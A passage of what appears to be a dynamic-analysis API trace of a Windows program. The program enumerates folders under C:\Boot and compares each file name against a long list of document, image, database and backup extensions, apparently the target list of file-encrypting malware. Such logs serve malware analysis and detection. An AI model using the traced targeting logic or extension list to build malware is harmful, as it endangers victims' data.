ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef6407cf, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="nl-NL", cAlternateFileName="")) returned 1 [0046.629] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4261060 | out: hHeap=0x5d0000) returned 1 [0046.629] FindNextFileW (in: hFindFile=0x4260188, lpFindFileData=0x348fa7c | out: lpFindFileData=0x348fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef65403a, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef65403a, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="pl-PL", cAlternateFileName="")) returned 1 [0046.629] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4261060 | out: hHeap=0x5d0000) returned 1 [0046.629] FindNextFileW (in: hFindFile=0x4260188, lpFindFileData=0x348fa7c | out: lpFindFileData=0x348fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6678d6, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef6678d6, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="pt-BR", cAlternateFileName="")) returned 1 [0046.629] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4261060 | out: hHeap=0x5d0000) returned 1 [0046.629] FindNextFileW (in: hFindFile=0x4260188, lpFindFileData=0x348fa7c | out: lpFindFileData=0x348fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010f167, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef6714dc, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="pt-PT", cAlternateFileName="")) returned 1 [0046.630] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4261060 | out: hHeap=0x5d0000) returned 1 [0046.630] FindNextFileW (in: hFindFile=0x4260188, lpFindFileData=0x348fa7c | out: lpFindFileData=0x348fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010f640, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef684d85, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="qps-ploc", cAlternateFileName="")) returned 1 [0046.630] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4261060 | out: hHeap=0x5d0000) returned 1 [0046.630] FindNextFileW (in: hFindFile=0x4260188, lpFindFileData=0x348fa7c | out: lpFindFileData=0x348fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4c33ce4, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa01ab61e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef9abff9, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Resources", cAlternateFileName="RESOUR~1")) returned 1 [0046.630] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x629728, Size=0x4000) returned 0x6be970 [0046.630] FindNextFileW (in: hFindFile=0x4260508, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4c33ce4, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa01ac01e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef9baa67, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0046.630] lstrlenW (lpString="C:\\Boot\\Resources\\en-US") returned 23 [0046.631] lstrcmpiW (lpString1="C:\\WINDOWS", lpString2="C:\\Boot\\Resources\\en-US") returned 1 [0046.631] lstrlenW (lpString="en-US") returned 5 [0046.631] lstrcmpiW (lpString1="C:\\WINDOWS", lpString2="en-US") returned -1 [0046.631] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xfffe) returned 0x4271068 [0046.631] lstrlenW (lpString="C:\\Boot\\Resources\\en-US") returned 23 [0046.631] FindFirstFileW (in: lpFileName="C:\\Boot\\Resources\\en-US\\*", lpFindFileData=0x348f584 | out: lpFindFileData=0x348f584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4c33ce4, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa01ac01e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef9baa67, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x629728, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x4260608 [0046.631] FindNextFileW (in: hFindFile=0x4260608, lpFindFileData=0x348f584 | out: lpFindFileData=0x348f584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4c33ce4, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa01ac01e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef9baa67, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x629728, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0046.631] FindNextFileW (in: hFindFile=0x4260608, lpFindFileData=0x348f584 | out: lpFindFileData=0x348f584*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4c33ce4, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef9baa67, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0x31acad58, ftLastWriteTime.dwHighDateTime=0x1d2a030, nFileSizeHigh=0x0, nFileSizeLow=0x2fa0, dwReserved0=0x629728, dwReserved1=0x2e0000, cFileName="bootres.dll.mui", cAlternateFileName="BOOTRE~1.MUI")) returned 1 [0046.631] lstrlenW (lpString="bootres.dll.mui") returned 15 [0046.631] lstrlenW (lpString=".1cd") returned 4 [0046.631] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0046.631] lstrlenW (lpString=".3ds") returned 4 [0046.631] lstrcmpiW (lpString1=".3ds", lpString2=".mui") returned -1 [0046.631] lstrlenW (lpString=".3fr") returned 4 [0046.631] lstrcmpiW (lpString1=".3fr", lpString2=".mui") returned -1 [0046.631] lstrlenW (lpString=".3g2") returned 4 [0046.631] lstrcmpiW (lpString1=".3g2", lpString2=".mui") returned -1 [0046.631] lstrlenW (lpString=".3gp") returned 4 [0046.631] lstrcmpiW (lpString1=".3gp", lpString2=".mui") returned -1 [0046.631] lstrlenW (lpString=".7z") returned 3 [0046.631] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0046.631] lstrlenW (lpString=".accda") returned 6 [0046.631] lstrcmpiW (lpString1=".accda", lpString2="ll.mui") returned -1 [0046.631] lstrlenW (lpString=".accdb") returned 6 [0046.631] lstrcmpiW (lpString1=".accdb", lpString2="ll.mui") returned -1 [0046.632] lstrlenW (lpString=".accdc") returned 6 [0046.632] lstrcmpiW (lpString1=".accdc", lpString2="ll.mui") returned -1 [0046.632] lstrlenW (lpString=".accde") returned 6 [0046.632] lstrcmpiW (lpString1=".accde", lpString2="ll.mui") returned -1 [0046.632] lstrlenW (lpString=".accdt") returned 6 [0046.632] lstrcmpiW (lpString1=".accdt", lpString2="ll.mui") returned -1 [0046.632] lstrlenW (lpString=".accdw") returned 6 [0046.632] lstrcmpiW (lpString1=".accdw", lpString2="ll.mui") returned -1 [0046.632] lstrlenW (lpString=".adb") returned 4 [0046.632] lstrcmpiW (lpString1=".adb", lpString2=".mui") returned -1 [0046.632] lstrlenW (lpString=".adp") returned 4 [0046.632] lstrcmpiW (lpString1=".adp", lpString2=".mui") returned -1 [0046.632] lstrlenW (lpString=".ai") returned 3 [0046.632] lstrcmpiW (lpString1=".ai", lpString2="mui") returned -1 [0046.632] lstrlenW (lpString=".ai3") returned 4 [0046.632] lstrcmpiW (lpString1=".ai3", lpString2=".mui") returned -1 [0046.632] lstrlenW (lpString=".ai4") returned 4 [0046.632] lstrcmpiW (lpString1=".ai4", lpString2=".mui") returned -1 [0046.632] lstrlenW (lpString=".ai5") returned 4 [0046.632] lstrcmpiW (lpString1=".ai5", lpString2=".mui") returned -1 [0046.632] lstrlenW (lpString=".ai6") returned 4 [0046.632] lstrcmpiW (lpString1=".ai6", lpString2=".mui") returned -1 [0046.632] lstrlenW (lpString=".ai7") returned 4 [0046.632] lstrcmpiW (lpString1=".ai7", lpString2=".mui") returned -1 [0046.632] lstrlenW (lpString=".ai8") returned 4 [0046.632] lstrcmpiW (lpString1=".ai8", lpString2=".mui") returned -1 [0046.632] lstrlenW (lpString=".anim") returned 5 [0046.632] lstrcmpiW (lpString1=".anim", lpString2="l.mui") returned -1 [0046.632] lstrlenW (lpString=".arw") returned 4 [0046.632] lstrcmpiW (lpString1=".arw", lpString2=".mui") returned -1 [0046.632] lstrlenW (lpString=".as") returned 3 [0046.632] lstrcmpiW (lpString1=".as", lpString2="mui") returned -1 [0046.632] lstrlenW (lpString=".asa") returned 4 [0046.632] lstrcmpiW (lpString1=".asa", lpString2=".mui") returned -1 [0046.632] lstrlenW (lpString=".asc") returned 4 [0046.632] lstrcmpiW (lpString1=".asc", lpString2=".mui") returned -1 [0046.632] lstrlenW (lpString=".ascx") returned 5 [0046.632] lstrcmpiW (lpString1=".ascx", lpString2="l.mui") returned -1 [0046.632] lstrlenW (lpString=".asm") returned 4 [0046.633] lstrcmpiW (lpString1=".asm", lpString2=".mui") returned -1 [0046.633] lstrlenW (lpString=".asmx") returned 5 [0046.633] lstrcmpiW (lpString1=".asmx", lpString2="l.mui") returned -1 [0046.633] lstrlenW (lpString=".asp") returned 4 [0046.633] lstrcmpiW (lpString1=".asp", lpString2=".mui") returned -1 [0046.633] lstrlenW (lpString=".aspx") returned 5 [0046.633] lstrcmpiW (lpString1=".aspx", lpString2="l.mui") returned -1 [0046.633] lstrlenW (lpString=".asr") returned 4 [0046.633] lstrcmpiW (lpString1=".asr", lpString2=".mui") returned -1 [0046.633] lstrlenW (lpString=".asx") returned 4 [0046.633] lstrcmpiW (lpString1=".asx", lpString2=".mui") returned -1 [0046.633] lstrlenW (lpString=".avi") returned 4 [0046.633] lstrcmpiW (lpString1=".avi", lpString2=".mui") returned -1 [0046.633] lstrlenW (lpString=".avs") returned 4 [0046.633] lstrcmpiW (lpString1=".avs", lpString2=".mui") returned -1 [0046.633] lstrlenW (lpString=".backup") returned 7 [0046.633] lstrcmpiW (lpString1=".backup", lpString2="dll.mui") returned -1 [0046.633] lstrlenW (lpString=".bak") returned 4 [0046.633] lstrcmpiW (lpString1=".bak", lpString2=".mui") returned -1 [0046.633] lstrlenW (lpString=".bay") returned 4 [0046.633] lstrcmpiW (lpString1=".bay", lpString2=".mui") returned -1 [0046.633] lstrlenW (lpString=".bd") returned 3 [0046.633] lstrcmpiW (lpString1=".bd", lpString2="mui") returned -1 [0046.633] lstrlenW (lpString=".bin") returned 4 [0046.633] lstrcmpiW (lpString1=".bin", lpString2=".mui") returned -1 [0046.633] lstrlenW (lpString=".bmp") returned 4 [0046.633] lstrcmpiW (lpString1=".bmp", lpString2=".mui") returned -1 [0046.633] lstrlenW (lpString=".bz2") returned 4 [0046.633] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0046.633] lstrlenW (lpString=".c") returned 2 [0046.633] lstrcmpiW (lpString1=".c", lpString2="ui") returned -1 [0046.633] lstrlenW (lpString=".cdr") returned 4 [0046.633] lstrcmpiW (lpString1=".cdr", lpString2=".mui") returned -1 [0046.633] lstrlenW (lpString=".cer") returned 4 [0046.633] lstrcmpiW (lpString1=".cer", lpString2=".mui") returned -1 [0046.633] lstrlenW (lpString=".cf") returned 3 [0046.633] lstrcmpiW (lpString1=".cf", lpString2="mui") returned -1 [0046.633] lstrlenW (lpString=".cfc") returned 4 [0046.634] lstrcmpiW (lpString1=".cfc", lpString2=".mui") returned -1 [0046.634] lstrlenW (lpString=".cfm") returned 4 [0046.634] lstrcmpiW (lpString1=".cfm", lpString2=".mui") returned -1 [0046.634] lstrlenW (lpString=".cfml") returned 5 [0046.634] lstrcmpiW (lpString1=".cfml", lpString2="l.mui") returned -1 [0046.634] lstrlenW (lpString=".cfu") returned 4 [0046.634] lstrcmpiW (lpString1=".cfu", lpString2=".mui") returned -1 [0046.634] lstrlenW (lpString=".chm") returned 4 [0046.634] lstrcmpiW (lpString1=".chm", lpString2=".mui") returned -1 [0046.634] lstrlenW (lpString=".cin") returned 4 [0046.634] lstrcmpiW (lpString1=".cin", lpString2=".mui") returned -1 [0046.634] lstrlenW (lpString=".class") returned 6 [0046.634] lstrcmpiW (lpString1=".class", lpString2="ll.mui") returned -1 [0046.634] lstrlenW (lpString=".clx") returned 4 [0046.634] lstrcmpiW (lpString1=".clx", lpString2=".mui") returned -1 [0046.634] lstrlenW (lpString=".config") returned 7 [0046.634] lstrcmpiW (lpString1=".config", lpString2="dll.mui") returned -1 [0046.634] lstrlenW (lpString=".cpp") returned 4 [0046.634] lstrcmpiW (lpString1=".cpp", lpString2=".mui") returned -1 [0046.634] lstrlenW (lpString=".cr2") returned 4 [0046.634] lstrcmpiW (lpString1=".cr2", lpString2=".mui") returned -1 [0046.634] lstrlenW (lpString=".crt") returned 4 [0046.634] lstrcmpiW (lpString1=".crt", lpString2=".mui") returned -1 [0046.634] lstrlenW (lpString=".crw") returned 4 [0046.634] lstrcmpiW (lpString1=".crw", lpString2=".mui") returned -1 [0046.634] lstrlenW (lpString=".cs") returned 3 [0046.634] lstrcmpiW (lpString1=".cs", lpString2="mui") returned -1 [0046.634] lstrlenW (lpString=".css") returned 4 [0046.634] lstrcmpiW (lpString1=".css", lpString2=".mui") returned -1 [0046.634] lstrlenW (lpString=".csv") returned 4 [0046.634] lstrcmpiW (lpString1=".csv", lpString2=".mui") returned -1 [0046.634] lstrlenW (lpString=".cub") returned 4 [0046.634] lstrcmpiW (lpString1=".cub", lpString2=".mui") returned -1 [0046.634] lstrlenW (lpString=".dae") returned 4 [0046.634] lstrcmpiW (lpString1=".dae", lpString2=".mui") returned -1 [0046.634] lstrlenW (lpString=".dat") returned 4 [0046.634] lstrcmpiW (lpString1=".dat", lpString2=".mui") returned -1 [0046.634] lstrlenW (lpString=".db") returned 3 [0046.634] lstrcmpiW (lpString1=".db", lpString2="mui") returned -1 [0046.635] lstrlenW (lpString=".dbf") returned 4 [0046.635] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0046.635] lstrlenW (lpString=".dbx") returned 4 [0046.635] lstrcmpiW (lpString1=".dbx", lpString2=".mui") returned -1 [0046.635] lstrlenW (lpString=".dc3") returned 4 [0046.635] lstrcmpiW (lpString1=".dc3", lpString2=".mui") returned -1 [0046.635] lstrlenW (lpString=".dcm") returned 4 [0046.635] lstrcmpiW (lpString1=".dcm", lpString2=".mui") returned -1 [0046.635] lstrlenW (lpString=".dcr") returned 4 [0046.635] lstrcmpiW (lpString1=".dcr", lpString2=".mui") returned -1 [0046.635] lstrlenW (lpString=".der") returned 4 [0046.635] lstrcmpiW (lpString1=".der", lpString2=".mui") returned -1 [0046.635] lstrlenW (lpString=".dib") returned 4 [0046.635] lstrcmpiW (lpString1=".dib", lpString2=".mui") returned -1 [0046.635] lstrlenW (lpString=".dic") returned 4 [0046.635] lstrcmpiW (lpString1=".dic", lpString2=".mui") returned -1 [0046.635] lstrlenW (lpString=".dif") returned 4 [0046.635] lstrcmpiW (lpString1=".dif", lpString2=".mui") returned -1 [0046.635] lstrlenW (lpString=".divx") returned 5 [0046.635] lstrcmpiW (lpString1=".divx", lpString2="l.mui") returned -1 [0046.635] lstrlenW (lpString=".djvu") returned 5 [0046.635] lstrcmpiW (lpString1=".djvu", lpString2="l.mui") returned -1 [0046.635] lstrlenW (lpString=".dng") returned 4 [0046.635] lstrcmpiW (lpString1=".dng", lpString2=".mui") returned -1 [0046.635] lstrlenW (lpString=".doc") returned 4 [0046.635] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0046.635] lstrlenW (lpString=".docm") returned 5 [0046.635] lstrcmpiW (lpString1=".docm", lpString2="l.mui") returned -1 [0046.636] lstrlenW (lpString=".docx") returned 5 [0046.636] lstrcmpiW (lpString1=".docx", lpString2="l.mui") returned -1 [0046.636] lstrlenW (lpString=".dot") returned 4 [0046.636] lstrcmpiW (lpString1=".dot", lpString2=".mui") returned -1 [0046.636] lstrlenW (lpString=".dotm") returned 5 [0046.636] lstrcmpiW (lpString1=".dotm", lpString2="l.mui") returned -1 [0046.636] lstrlenW (lpString=".dotx") returned 5 [0046.636] lstrcmpiW (lpString1=".dotx", lpString2="l.mui") returned -1 [0046.636] lstrlenW (lpString=".dpx") returned 4 [0046.636] lstrcmpiW (lpString1=".dpx", lpString2=".mui") returned -1 [0046.636] lstrlenW (lpString=".dqy") returned 4 [0046.636] lstrcmpiW (lpString1=".dqy", lpString2=".mui") returned -1 [0046.636] lstrlenW (lpString=".dsn") returned 4 [0046.636] lstrcmpiW (lpString1=".dsn", lpString2=".mui") returned -1 [0046.636] lstrlenW (lpString=".dt") returned 3 [0046.636] lstrcmpiW (lpString1=".dt", lpString2="mui") returned -1 [0046.636] lstrlenW (lpString=".dtd") returned 4 [0046.636] lstrcmpiW (lpString1=".dtd", lpString2=".mui") returned -1 [0046.636] lstrlenW (lpString=".dwg") returned 4 [0046.636] lstrcmpiW (lpString1=".dwg", lpString2=".mui") returned -1 [0046.636] lstrlenW (lpString=".dwt") returned 4 [0046.636] lstrcmpiW (lpString1=".dwt", lpString2=".mui") returned -1 [0046.636] lstrlenW (lpString=".dx") returned 3 [0046.636] lstrcmpiW (lpString1=".dx", lpString2="mui") returned -1 [0046.636] lstrlenW (lpString=".dxf") returned 4 [0046.636] lstrcmpiW (lpString1=".dxf", lpString2=".mui") returned -1 [0046.636] lstrlenW (lpString=".edml") returned 5 [0046.636] lstrcmpiW (lpString1=".edml", lpString2="l.mui") returned -1 [0046.636] lstrlenW (lpString=".efd") returned 4 [0046.636] lstrcmpiW (lpString1=".efd", lpString2=".mui") returned -1 [0046.636] lstrlenW (lpString=".elf") returned 4 [0046.636] lstrcmpiW (lpString1=".elf", lpString2=".mui") returned -1 [0046.636] lstrlenW (lpString=".emf") returned 4 [0046.636] lstrcmpiW (lpString1=".emf", lpString2=".mui") returned -1 [0046.636] lstrlenW (lpString=".emz") returned 4 [0046.636] lstrcmpiW (lpString1=".emz", lpString2=".mui") returned -1 [0046.636] lstrlenW (lpString=".epf") returned 4 [0046.636] lstrcmpiW (lpString1=".epf", lpString2=".mui") returned -1 [0046.637] lstrlenW (lpString=".eps") returned 4 [0046.637] lstrcmpiW (lpString1=".eps", lpString2=".mui") returned -1 [0046.637] lstrlenW (lpString=".epsf") returned 5 [0046.637] lstrcmpiW (lpString1=".epsf", lpString2="l.mui") returned -1 [0046.637] lstrlenW (lpString=".epsp") returned 5 [0046.637] lstrcmpiW (lpString1=".epsp", lpString2="l.mui") returned -1 [0046.637] lstrlenW (lpString=".erf") returned 4 [0046.637] lstrcmpiW (lpString1=".erf", lpString2=".mui") returned -1 [0046.637] lstrlenW (lpString=".exr") returned 4 [0046.637] lstrcmpiW (lpString1=".exr", lpString2=".mui") returned -1 [0046.637] lstrlenW (lpString=".f4v") returned 4 [0046.637] lstrcmpiW (lpString1=".f4v", lpString2=".mui") returned -1 [0046.637] lstrlenW (lpString=".fido") returned 5 [0046.637] lstrcmpiW (lpString1=".fido", lpString2="l.mui") returned -1 [0046.637] lstrlenW (lpString=".flm") returned 4 [0046.637] lstrcmpiW (lpString1=".flm", lpString2=".mui") returned -1 [0046.637] lstrlenW (lpString=".flv") returned 4 [0046.637] lstrcmpiW (lpString1=".flv", lpString2=".mui") returned -1 [0046.637] lstrlenW (lpString=".frm") returned 4 [0046.637] lstrcmpiW (lpString1=".frm", lpString2=".mui") returned -1 [0046.637] lstrlenW (lpString=".fxg") returned 4 [0046.637] lstrcmpiW (lpString1=".fxg", lpString2=".mui") returned -1 [0046.637] lstrlenW (lpString=".geo") returned 4 [0046.637] lstrcmpiW (lpString1=".geo", lpString2=".mui") returned -1 [0046.637] lstrlenW (lpString=".gif") returned 4 [0046.637] lstrcmpiW (lpString1=".gif", lpString2=".mui") returned -1 [0046.637] lstrlenW (lpString=".grs") returned 4 [0046.637] lstrcmpiW (lpString1=".grs", lpString2=".mui") returned -1 [0046.637] lstrlenW (lpString=".gz") returned 3 [0046.637] lstrcmpiW (lpString1=".gz", lpString2="mui") returned -1 [0046.637] lstrlenW (lpString=".h") returned 2 [0046.637] lstrcmpiW (lpString1=".h", lpString2="ui") returned -1 [0046.637] lstrlenW (lpString=".hdr") returned 4 [0046.637] lstrcmpiW (lpString1=".hdr", lpString2=".mui") returned -1 [0046.637] lstrlenW (lpString=".hpp") returned 4 [0046.637] lstrcmpiW (lpString1=".hpp", lpString2=".mui") returned -1 [0046.637] lstrlenW (lpString=".hta") returned 4 [0046.637] lstrcmpiW (lpString1=".hta", lpString2=".mui") returned -1 [0046.637] lstrlenW (lpString=".htc") returned 4 [0046.638] lstrcmpiW (lpString1=".htc", lpString2=".mui") returned -1 [0046.638] lstrlenW (lpString=".htm") returned 4 [0046.638] lstrcmpiW (lpString1=".htm", lpString2=".mui") returned -1 [0046.638] lstrlenW (lpString=".html") returned 5 [0046.638] lstrcmpiW (lpString1=".html", lpString2="l.mui") returned -1 [0046.638] lstrlenW (lpString=".icb") returned 4 [0046.638] lstrcmpiW (lpString1=".icb", lpString2=".mui") returned -1 [0046.638] lstrlenW (lpString=".ics") returned 4 [0046.638] lstrcmpiW (lpString1=".ics", lpString2=".mui") returned -1 [0046.638] lstrlenW (lpString=".iff") returned 4 [0046.638] lstrcmpiW (lpString1=".iff", lpString2=".mui") returned -1 [0046.638] lstrlenW (lpString=".inc") returned 4 [0046.638] lstrcmpiW (lpString1=".inc", lpString2=".mui") returned -1 [0046.638] lstrlenW (lpString=".indd") returned 5 [0046.638] lstrcmpiW (lpString1=".indd", lpString2="l.mui") returned -1 [0046.638] lstrlenW (lpString=".ini") returned 4 [0046.638] lstrcmpiW (lpString1=".ini", lpString2=".mui") returned -1 [0046.638] lstrlenW (lpString=".iqy") returned 4 [0046.638] lstrcmpiW (lpString1=".iqy", lpString2=".mui") returned -1 [0046.638] lstrlenW (lpString=".j2c") returned 4 [0046.638] lstrcmpiW (lpString1=".j2c", lpString2=".mui") returned -1 [0046.638] lstrlenW (lpString=".j2k") returned 4 [0046.638] lstrcmpiW (lpString1=".j2k", lpString2=".mui") returned -1 [0046.638] lstrlenW (lpString=".java") returned 5 [0046.638] lstrcmpiW (lpString1=".java", lpString2="l.mui") returned -1 [0046.638] lstrlenW (lpString=".jp2") returned 4 [0046.638] lstrcmpiW (lpString1=".jp2", lpString2=".mui") returned -1 [0046.638] lstrlenW (lpString=".jpc") returned 4 [0046.638] lstrcmpiW (lpString1=".jpc", lpString2=".mui") returned -1 [0046.638] lstrlenW (lpString=".jpe") returned 4 [0046.638] lstrcmpiW (lpString1=".jpe", lpString2=".mui") returned -1 [0046.638] lstrlenW (lpString=".jpeg") returned 5 [0046.638] lstrcmpiW (lpString1=".jpeg", lpString2="l.mui") returned -1 [0046.638] lstrlenW (lpString=".jpf") returned 4 [0046.639] lstrcmpiW (lpString1=".jpf", lpString2=".mui") returned -1 [0046.639] lstrlenW (lpString=".jpg") returned 4 [0046.639] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0046.639] lstrlenW (lpString=".jpx") returned 4 [0046.639] lstrcmpiW (lpString1=".jpx", lpString2=".mui") returned -1 [0046.639] lstrlenW (lpString=".js") returned 3 [0046.639] lstrcmpiW (lpString1=".js", lpString2="mui") returned -1 [0046.639] lstrlenW (lpString=".jsf") returned 4 [0046.639] lstrcmpiW (lpString1=".jsf", lpString2=".mui") returned -1 [0046.639] lstrlenW (lpString=".json") returned 5 [0046.639] lstrcmpiW (lpString1=".json", lpString2="l.mui") returned -1 [0046.639] lstrlenW (lpString=".jsp") returned 4 [0046.639] lstrcmpiW (lpString1=".jsp", lpString2=".mui") returned -1 [0046.639] lstrlenW (lpString=".kdc") returned 4 [0046.639] lstrcmpiW (lpString1=".kdc", lpString2=".mui") returned -1 [0046.639] lstrlenW (lpString=".kmz") returned 4 [0046.639] lstrcmpiW (lpString1=".kmz", lpString2=".mui") returned -1 [0046.639] lstrlenW (lpString=".kwm") returned 4 [0046.639] lstrcmpiW (lpString1=".kwm", lpString2=".mui") returned -1 [0046.639] lstrlenW (lpString=".lasso") returned 6 [0046.639] lstrcmpiW (lpString1=".lasso", lpString2="ll.mui") returned -1 [0046.639] lstrlenW (lpString=".lbi") returned 4 [0046.639] lstrcmpiW (lpString1=".lbi", lpString2=".mui") returned -1 [0046.639] lstrlenW (lpString=".lgf") returned 4 [0046.639] lstrcmpiW (lpString1=".lgf", lpString2=".mui") returned -1 [0046.639] lstrlenW (lpString=".lgp") returned 4 [0046.639] lstrcmpiW (lpString1=".lgp", lpString2=".mui") returned -1 [0046.639] lstrlenW (lpString=".log") returned 4 [0046.639] lstrcmpiW (lpString1=".log", lpString2=".mui") returned -1 [0046.639] lstrlenW (lpString=".m1v") returned 4 [0046.639] lstrcmpiW (lpString1=".m1v", lpString2=".mui") returned -1 [0046.639] lstrlenW (lpString=".m4a") returned 4 [0046.639] lstrcmpiW (lpString1=".m4a", lpString2=".mui") returned -1 [0046.639] lstrlenW (lpString=".m4v") returned 4 [0046.639] lstrcmpiW (lpString1=".m4v", lpString2=".mui") returned -1 [0046.639] lstrlenW (lpString=".max") returned 4 [0046.639] lstrcmpiW (lpString1=".max", lpString2=".mui") returned -1 [0046.640] lstrlenW (lpString=".md") returned 3 [0046.640] lstrcmpiW (lpString1=".md", lpString2="mui") returned -1 [0046.640] lstrlenW (lpString=".mda") returned 4 [0046.640] lstrcmpiW (lpString1=".mda", lpString2=".mui") returned -1 [0046.640] lstrlenW (lpString=".mdb") returned 4 [0046.640] lstrcmpiW (lpString1=".mdb", lpString2=".mui") returned -1 [0046.640] lstrlenW (lpString=".mde") returned 4 [0046.640] lstrcmpiW (lpString1=".mde", lpString2=".mui") returned -1 [0046.640] lstrlenW (lpString=".mdf") returned 4 [0046.640] lstrcmpiW (lpString1=".mdf", lpString2=".mui") returned -1 [0046.640] lstrlenW (lpString=".mdw") returned 4 [0046.640] lstrcmpiW (lpString1=".mdw", lpString2=".mui") returned -1 [0046.640] lstrlenW (lpString=".mef") returned 4 [0046.640] lstrcmpiW (lpString1=".mef", lpString2=".mui") returned -1 [0046.640] lstrlenW (lpString=".mft") returned 4 [0046.640] lstrcmpiW (lpString1=".mft", lpString2=".mui") returned -1 [0046.640] lstrlenW (lpString=".mfw") returned 4 [0046.640] lstrcmpiW (lpString1=".mfw", lpString2=".mui") returned -1 [0046.640] lstrlenW (lpString=".mht") returned 4 [0046.640] lstrcmpiW (lpString1=".mht", lpString2=".mui") returned -1 [0046.640] lstrlenW (lpString=".mhtml") returned 6 [0046.640] lstrcmpiW (lpString1=".mhtml", lpString2="ll.mui") returned -1 [0046.640] lstrlenW (lpString=".mka") returned 4 [0046.640] lstrcmpiW (lpString1=".mka", lpString2=".mui") returned -1 [0046.640] lstrlenW (lpString=".mkidx") returned 6 [0046.640] lstrcmpiW (lpString1=".mkidx", lpString2="ll.mui") returned -1 [0046.640] lstrlenW (lpString=".mkv") returned 4 [0046.640] lstrcmpiW (lpString1=".mkv", lpString2=".mui") returned -1 [0046.640] lstrlenW (lpString=".mos") returned 4 [0046.640] lstrcmpiW (lpString1=".mos", lpString2=".mui") returned -1 [0046.640] lstrlenW (lpString=".mov") returned 4 [0046.640] lstrcmpiW (lpString1=".mov", lpString2=".mui") returned -1 [0046.640] lstrlenW (lpString=".mp3") returned 4 [0046.640] lstrcmpiW (lpString1=".mp3", lpString2=".mui") returned -1 [0046.640] lstrlenW (lpString=".mp4") returned 4 [0046.640] lstrcmpiW (lpString1=".mp4", lpString2=".mui") returned -1 [0046.640] lstrlenW (lpString=".mpeg") returned 5 [0046.640] lstrcmpiW (lpString1=".mpeg", lpString2="l.mui") returned -1 [0046.641] lstrlenW (lpString=".mpg") returned 4 [0046.641] lstrcmpiW (lpString1=".mpg", lpString2=".mui") returned 